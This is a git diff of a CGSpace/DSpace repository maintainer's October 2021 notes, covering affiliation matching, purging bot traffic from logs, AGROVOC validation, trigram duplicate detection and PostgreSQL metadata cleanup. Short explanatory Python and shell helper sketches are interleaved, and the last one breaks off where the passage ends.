                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • He mentioned that the one issue is that when you deposit to a workflow you don’t get a Handle or any kind of identifier back!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • diff --git a/docs/2021-10/index.html b/docs/2021-10/index.html index a7e74538a..8b9992649 100644 --- a/docs/2021-10/index.html +++ b/docs/2021-10/index.html @@ -46,7 +46,7 @@ $ wc -l /tmp/2021-10-01-affiliations.txt So we have 1879/7100 (26.46%) matching already "/> - + @@ -136,15 +136,15 @@ So we have 1879/7100 (26.46%) matching already
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Export all affiliations on CGSpace and run them against the latest RoR data dump:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
-$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -1879
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
+$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +1879
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • So we have 1879/7100 (26.46%) matching already
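The match rate above was worked out by hand from the `csvgrep` and `wc -l` counts. As a rough sketch, the same figure could be computed directly from the matching CSV. This assumes the file has a `matched` column containing `true` for hits (as the `csvgrep -c matched -m true` call suggests); the `organization` column name and the sample rows are hypothetical stand-ins, not real data from the export.

```python
import csv
import io


def match_rate(rows):
    """Return (matched, total, percent) for rows that carry a 'matched' column."""
    matched = 0
    total = 0
    for row in rows:
        total += 1
        # Treat only an explicit "true" as a match (assumed value format)
        if row["matched"].strip().lower() == "true":
            matched += 1
    percent = 100 * matched / total if total else 0.0
    return matched, total, percent


# Hypothetical sample standing in for the real matching CSV
sample = io.StringIO(
    "organization,matched\n"
    "Example Institute A,true\n"
    "Example Institute B,false\n"
    "Example Institute C,false\n"
    "Example Institute D,true\n"
)

matched, total, percent = match_rate(csv.DictReader(sample))
print(f"{matched}/{total} ({percent:.2f}%)")
```

To run it against the real output, replace `sample` with an open file handle on the matching CSV. Counting the total from the same file avoids relying on a separate `wc -l` over the text export.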

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2021-10-03

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                @@ -185,37 +185,37 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/*.log* | grep 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' | awk '{print $1}' | sort | uniq > /tmp/mozilla-4.0-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -# wc -l /tmp/mozilla-4.0-ips.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -543 /tmp/mozilla-4.0-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              # zcat --force /var/log/nginx/*.log* | grep 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' | awk '{print $1}' | sort | uniq > /tmp/mozilla-4.0-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +# wc -l /tmp/mozilla-4.0-ips.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +543 /tmp/mozilla-4.0-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Then I resolved the IPs and extracted the ones belonging to Amazon:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ ./ilri/resolve-addresses-geoip2.py -i /tmp/mozilla-4.0-ips.txt -k "$ABUSEIPDB_API_KEY" -o /tmp/mozilla-4.0-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ csvgrep -c asn -m 14618 /tmp/mozilla-4.0-ips.csv | csvcut -c ip | sed 1d | tee /tmp/amazon-ips.txt | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ ./ilri/resolve-addresses-geoip2.py -i /tmp/mozilla-4.0-ips.txt -k "$ABUSEIPDB_API_KEY" -o /tmp/mozilla-4.0-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvgrep -c asn -m 14618 /tmp/mozilla-4.0-ips.csv | csvcut -c ip | sed 1d | tee /tmp/amazon-ips.txt | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
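The ASN filtering step above can also be sketched without csvkit. This is only a rough illustration, not the method used in these notes: `filter_ips_by_asn` is a hypothetical helper name, and it assumes the resolved CSV has a header row containing `ip` and `asn` columns and no quoted fields with embedded commas.

```shell
# Hypothetical helper (not part of the ilri scripts): print the "ip" column
# for every row whose "asn" column equals the requested ASN.
# Assumes a simple CSV: header row present, no quoted fields containing commas.
filter_ips_by_asn() {
    asn="$1"
    csv="$2"
    awk -F, -v want="$asn" '
        NR == 1 {
            # Locate the columns by header name rather than by position
            for (i = 1; i <= NF; i++) {
                if ($i == "asn") asn_col = i
                if ($i == "ip") ip_col = i
            }
            next
        }
        # Only print when both columns were found and the ASN matches
        asn_col && ip_col && $asn_col == want { print $ip_col }
    ' "$csv"
}
```

It could be used in place of the `csvgrep | csvcut | sed 1d` pipeline, for example `filter_ips_by_asn 14618 /tmp/mozilla-4.0-ips.csv | tee /tmp/amazon-ips.txt | wc -l`. For CSVs with quoted fields, csvkit remains the safer choice.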
 • I think I will purge them all, as several indicators suggest they are bots: an implausible user agent and IPs owned by Amazon
 • Even more interesting, these requests are skewed VERY heavily toward the CGIAR System community:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   1592 GET /handle/10947/2526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1592 GET /handle/10947/2527
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1592 GET /handle/10947/34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1593 GET /handle/10947/6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1594 GET /handle/10947/1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1598 GET /handle/10947/2515
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1598 GET /handle/10947/2516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10568/101335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10568/91688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10947/2517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10947/2518
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10947/2519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10947/2708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10947/2871
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1600 GET /handle/10568/89342
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1600 GET /handle/10947/4467
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1607 GET /handle/10568/103816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                - 290382 GET /handle/10568/83389
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     1592 GET /handle/10947/2526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1592 GET /handle/10947/2527
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1592 GET /handle/10947/34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1593 GET /handle/10947/6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1594 GET /handle/10947/1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1598 GET /handle/10947/2515
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1598 GET /handle/10947/2516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10568/101335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10568/91688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10947/2517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10947/2518
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10947/2519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10947/2708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10947/2871
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1600 GET /handle/10568/89342
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1600 GET /handle/10947/4467
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1607 GET /handle/10568/103816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  + 290382 GET /handle/10568/83389
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
• Before I purge all of those I will ask Samuel Stacey from the System Office for some insight…
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Meeting with Michael Victor, Peter, Jane, and Abenet about the future of repositories in the One CGIAR
• Meeting with Michelle from Altmetric about their new CSV upload system
@@ -231,10 +231,10 @@ $ csvgrep -c asn -m 14618 /tmp/mozilla-4.0-ip
                                                                                                                                                                                                                                                                                  • Extract the AGROVOC subjects from IWMI’s 292 publications to validate them against AGROVOC:
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                  $ csvcut -c 'dcterms.subject[en_US]' ~/Downloads/2021-10-03-non-IWMI-publications.csv | sed -e 1d -e 's/||/\n/g' -e 's/"//g' | sort -u > /tmp/agrovoc.txt
                                                                                                                                                                                                                                                                                  -$ ./ilri/agrovoc-lookup.py -i /tmp/agrovoc-sorted.txt -o /tmp/agrovoc-matches.csv
                                                                                                                                                                                                                                                                                  -$ csvgrep -c 'number of matches' -m '0' /tmp/agrovoc-matches.csv | csvcut -c 1 > /tmp/invalid-agrovoc.csv
                                                                                                                                                                                                                                                                                  -

                                                                                                                                                                                                                                                                                  2021-10-05

                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                  $ csvcut -c 'dcterms.subject[en_US]' ~/Downloads/2021-10-03-non-IWMI-publications.csv | sed -e 1d -e 's/||/\n/g' -e 's/"//g' | sort -u > /tmp/agrovoc.txt
                                                                                                                                                                                                                                                                                  +$ ./ilri/agrovoc-lookup.py -i /tmp/agrovoc-sorted.txt -o /tmp/agrovoc-matches.csv
                                                                                                                                                                                                                                                                                  +$ csvgrep -c 'number of matches' -m '0' /tmp/agrovoc-matches.csv | csvcut -c 1 > /tmp/invalid-agrovoc.csv
                                                                                                                                                                                                                                                                                  +
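For readers who prefer to avoid the `sed` step, the extraction of unique subjects can be sketched in Python. This is only an illustration, not the script used in these notes: the function name `unique_subjects` is hypothetical, and it assumes the export uses `||` as the multi-value separator, as the `sed` expression above suggests.

```python
import csv
import io


def unique_subjects(csv_text, column="dcterms.subject[en_US]", separator="||"):
    """Return the sorted, de-duplicated values of a multi-value CSV column.

    Hypothetical helper: mirrors `csvcut | sed | sort -u`, but parses the
    CSV properly so quoted values containing commas survive intact.
    """
    reader = csv.DictReader(io.StringIO(csv_text))
    subjects = set()
    for row in reader:
        # A cell may hold several values joined by the separator
        for value in (row.get(column) or "").split(separator):
            value = value.strip()
            if value:
                subjects.add(value)
    return sorted(subjects)


example = (
    "id,dcterms.subject[en_US]\n"
    "1,WATER||IRRIGATION\n"
    '2,"IRRIGATION||SOIL, FERTILITY"\n'
)
print("\n".join(unique_subjects(example)))
```

Unlike stripping every `"` with `sed`, the CSV parser only removes quoting characters, so a quote that is part of a subject term would be kept. Note that Python sorts by code point, which may differ from `sort -u` under some locales.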

                                                                                                                                                                                                                                                                                  2021-10-05

                                                                                                                                                                                                                                                                                  • Sam put me in touch with Dodi from the System Office web team and he confirmed that the Amazon requests are not theirs
                                                                                                                                                                                                                                                                                      @@ -243,11 +243,11 @@ $ csvgrep -c 'number of matches' -m <
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/robot-ips.txt -p
                                                                                                                                                                                                                                                                                  -...
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                  -Total number of bot hits purged: 465119
                                                                                                                                                                                                                                                                                  -

                                                                                                                                                                                                                                                                                  2021-10-06

                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/robot-ips.txt -p
                                                                                                                                                                                                                                                                                  +...
                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                  +Total number of bot hits purged: 465119
                                                                                                                                                                                                                                                                                  +

                                                                                                                                                                                                                                                                                  2021-10-06

                                                                                                                                                                                                                                                                                  • Thinking about how we could check for duplicates before importing
                                                                                                                                                                                                                                                                                      @@ -255,14 +255,14 @@ $ csvgrep -c 'number of matches' -m <
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                  localhost/dspace63= > CREATE EXTENSION pg_trgm;
                                                                                                                                                                                                                                                                                  -localhost/dspace63= > SELECT metadata_value_id, text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines') > 0.5;
                                                                                                                                                                                                                                                                                  - metadata_value_id │                                         text_value                                         │           dspace_object_id
                                                                                                                                                                                                                                                                                  -───────────────────┼────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                  -           3652624 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ b7f0bf12-b183-4b2f-bbd2-7a5697b0c467
                                                                                                                                                                                                                                                                                  -           3677663 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ fb62f551-f4a5-4407-8cdc-6bff6dac399e
                                                                                                                                                                                                                                                                                  -(2 rows)
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                    localhost/dspace63= > CREATE EXTENSION pg_trgm;
                                                                                                                                                                                                                                                                                    +localhost/dspace63= > SELECT metadata_value_id, text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines') > 0.5;
                                                                                                                                                                                                                                                                                    + metadata_value_id │                                         text_value                                         │           dspace_object_id
                                                                                                                                                                                                                                                                                    +───────────────────┼────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                    +           3652624 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ b7f0bf12-b183-4b2f-bbd2-7a5697b0c467
                                                                                                                                                                                                                                                                                    +           3677663 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ fb62f551-f4a5-4407-8cdc-6bff6dac399e
                                                                                                                                                                                                                                                                                    +(2 rows)
                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                    • I was able to find an exact duplicate for an IITA item by searching for its title (I already knew that these existed)
                                                                                                                                                                                                                                                                                    • I started working on a basic Python script to do this and managed to find an actual duplicate in the recent IWMI items
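The idea behind the `SIMILARITY()` query can be sketched in plain Python. This is a rough approximation of how `pg_trgm` scores two strings (lowercase, split into alphanumeric words, pad each word, compare the sets of three-character sequences), not the script mentioned above. The function names and the candidate list are hypothetical, and scores may differ slightly from PostgreSQL's for non-ASCII text.

```python
import re


def trigrams(text):
    """Approximate pg_trgm: pad each lowercased word with two leading
    spaces and one trailing space, then collect 3-character windows."""
    grams = set()
    for word in re.findall(r"[a-z0-9]+", text.lower()):
        padded = f"  {word} "
        grams.update(padded[i:i + 3] for i in range(len(padded) - 2))
    return grams


def similarity(a, b):
    """Shared trigrams divided by all distinct trigrams (0.0 to 1.0)."""
    ta, tb = trigrams(a), trigrams(b)
    if not ta or not tb:
        return 0.0
    return len(ta & tb) / len(ta | tb)


def find_possible_duplicates(title, candidates, threshold=0.5):
    """Return candidate titles scoring above the threshold, like the
    `> 0.5` condition in the SQL query."""
    return [c for c in candidates if similarity(title, c) > threshold]


title = ("Molecular marker based genetic diversity assessment of "
         "Striga resistant maize inbred lines")
existing = [title, "Annual report 2020"]  # hypothetical repository titles
print(find_possible_duplicates(title, existing))
```

Doing the comparison in the database is likely preferable for a full repository, since `pg_trgm` can use an index; the Python version is mainly useful for checking a CSV before import.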
                                                                                                                                                                                                                                                                                        @@ -291,10 +291,10 @@ localhost/dspace63= > SELECT metadata_value_id, text_value, dspace_object_id
                                                                                                                                                                                                                                                                                      • Then I ran this new version of csv-metadata-quality on an export of IWMI’s community, minus some fields I don’t want to check:
                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                      $ csvcut -C 'dc.date.accessioned,dc.date.accessioned[],dc.date.accessioned[en_US],dc.date.available,dc.date.available[],dc.date.available[en_US],dcterms.issued[en_US],dcterms.issued[],dcterms.issued,dc.description.provenance[en],dc.description.provenance[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dcterms.abstract[en_US],dcterms.bibliographicCitation[en_US],collection' ~/Downloads/iwmi.csv > /tmp/iwmi-to-check.csv
                                                                                                                                                                                                                                                                                      -$ csv-metadata-quality -i /tmp/iwmi-to-check.csv -o /tmp/iwmi.csv | tee /tmp/out.log
                                                                                                                                                                                                                                                                                      -$ xsv split -s 2000 /tmp /tmp/iwmi.csv
                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                        $ csvcut -C 'dc.date.accessioned,dc.date.accessioned[],dc.date.accessioned[en_US],dc.date.available,dc.date.available[],dc.date.available[en_US],dcterms.issued[en_US],dcterms.issued[],dcterms.issued,dc.description.provenance[en],dc.description.provenance[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dcterms.abstract[en_US],dcterms.bibliographicCitation[en_US],collection' ~/Downloads/iwmi.csv > /tmp/iwmi-to-check.csv
                                                                                                                                                                                                                                                                                        +$ csv-metadata-quality -i /tmp/iwmi-to-check.csv -o /tmp/iwmi.csv | tee /tmp/out.log
                                                                                                                                                                                                                                                                                        +$ xsv split -s 2000 /tmp /tmp/iwmi.csv
                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                        • I noticed each CSV only had 10 or 20 corrections, mostly that none of the duplicate metadata values were removed in the CSVs…
                                                                                                                                                                                                                                                                                          • I cut a subset of the fields from the main CSV and tried again, but DSpace said “no changes detected”
@@ -319,54 +319,54 @@ Try doing it in two imports. In first import, remove all authors. In second impo
                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                        $ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.iwmilibrary[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],cg.river.basin[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' ~/Downloads/iwmi.csv > /tmp/iwmi-duplicate-metadata.csv
                                                                                                                                                                                                                                                                                        -# Copy and blank columns in OpenRefine
                                                                                                                                                                                                                                                                                        -$ csv-metadata-quality -i ~/Downloads/2021-10-07-IWMI-duplicate-metadata-csv.csv -o /tmp/iwmi-duplicates-cleaned.csv | tee /tmp/out.log
                                                                                                                                                                                                                                                                                        -$ xsv split -s 2000 /tmp /tmp/iwmi-duplicates-cleaned.csv
                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                          $ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.iwmilibrary[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],cg.river.basin[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' ~/Downloads/iwmi.csv > /tmp/iwmi-duplicate-metadata.csv
                                                                                                                                                                                                                                                                                          +# Copy and blank columns in OpenRefine
                                                                                                                                                                                                                                                                                          +$ csv-metadata-quality -i ~/Downloads/2021-10-07-IWMI-duplicate-metadata-csv.csv -o /tmp/iwmi-duplicates-cleaned.csv | tee /tmp/out.log
                                                                                                                                                                                                                                                                                          +$ xsv split -s 2000 /tmp /tmp/iwmi-duplicates-cleaned.csv
                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                          • It takes a few hours per 2,000 items because DSpace processes them so slowly… sigh…

                                                                                                                                                                                                                                                                                          2021-10-08

                                                                                                                                                                                                                                                                                          • I decided to update these records in PostgreSQL instead of via several CSV batches, as there were several others to normalize too:
                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                          cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
                                                                                                                                                                                                                                                                                          - text_lang |  count  
                                                                                                                                                                                                                                                                                          ------------+---------
                                                                                                                                                                                                                                                                                          - en_US     | 2603711
                                                                                                                                                                                                                                                                                          - en_Fu     |  115568
                                                                                                                                                                                                                                                                                          - en        |    8818
                                                                                                                                                                                                                                                                                          -           |    5286
                                                                                                                                                                                                                                                                                          - fr        |       2
                                                                                                                                                                                                                                                                                          - vn        |       2
                                                                                                                                                                                                                                                                                          -           |       0
                                                                                                                                                                                                                                                                                          -(7 rows)
                                                                                                                                                                                                                                                                                          -cgspace=# BEGIN;
                                                                                                                                                                                                                                                                                          -cgspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en_Fu', 'en', '');
                                                                                                                                                                                                                                                                                          -UPDATE 129673
                                                                                                                                                                                                                                                                                          -cgspace=# COMMIT;
                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                            cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
                                                                                                                                                                                                                                                                                            + text_lang |  count  
                                                                                                                                                                                                                                                                                            +-----------+---------
                                                                                                                                                                                                                                                                                            + en_US     | 2603711
                                                                                                                                                                                                                                                                                            + en_Fu     |  115568
                                                                                                                                                                                                                                                                                            + en        |    8818
                                                                                                                                                                                                                                                                                            +           |    5286
                                                                                                                                                                                                                                                                                            + fr        |       2
                                                                                                                                                                                                                                                                                            + vn        |       2
                                                                                                                                                                                                                                                                                            +           |       0
                                                                                                                                                                                                                                                                                            +(7 rows)
                                                                                                                                                                                                                                                                                            +cgspace=# BEGIN;
                                                                                                                                                                                                                                                                                            +cgspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en_Fu', 'en', '');
                                                                                                                                                                                                                                                                                            +UPDATE 129673
                                                                                                                                                                                                                                                                                            +cgspace=# COMMIT;
                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                            • So all this effort to remove ~400 duplicate metadata values in the IWMI community hmmm:
                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                            $ grep -c 'Removing duplicate value' /tmp/out.log
                                                                                                                                                                                                                                                                                            -391
                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                              $ grep -c 'Removing duplicate value' /tmp/out.log
                                                                                                                                                                                                                                                                                              +391
                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                              • I tried to export ILRI’s community, but ran into the export bug (DS-4211)
                                                                                                                                                                                                                                                                                                • After applying the patch on my local instance I was able to export, but found many duplicate items in the CSV (as I also noticed in 2021-02):
                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                              $ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sed '1d' | wc -l 
                                                                                                                                                                                                                                                                                              -32070
                                                                                                                                                                                                                                                                                              -$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed '1d' | wc -l
                                                                                                                                                                                                                                                                                              -19315
                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                $ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sed '1d' | wc -l 
                                                                                                                                                                                                                                                                                                +32070
                                                                                                                                                                                                                                                                                                +$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed '1d' | wc -l
                                                                                                                                                                                                                                                                                                +19315
                                                                                                                                                                                                                                                                                                +
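The row count versus unique `id` count above can also be checked without csvkit. This is a minimal sketch using only the Python standard library. The `count_ids` helper and the sample data are hypothetical stand-ins for the real export, and the sketch assumes the CSV has an `id` column as in the commands above.

```python
import csv
import io


def count_ids(csv_file, id_column="id"):
    """Return (total_rows, unique_ids) for one column of an open CSV file."""
    reader = csv.DictReader(csv_file)  # the header row is consumed here, not counted
    ids = [row[id_column] for row in reader]
    return len(ids), len(set(ids))


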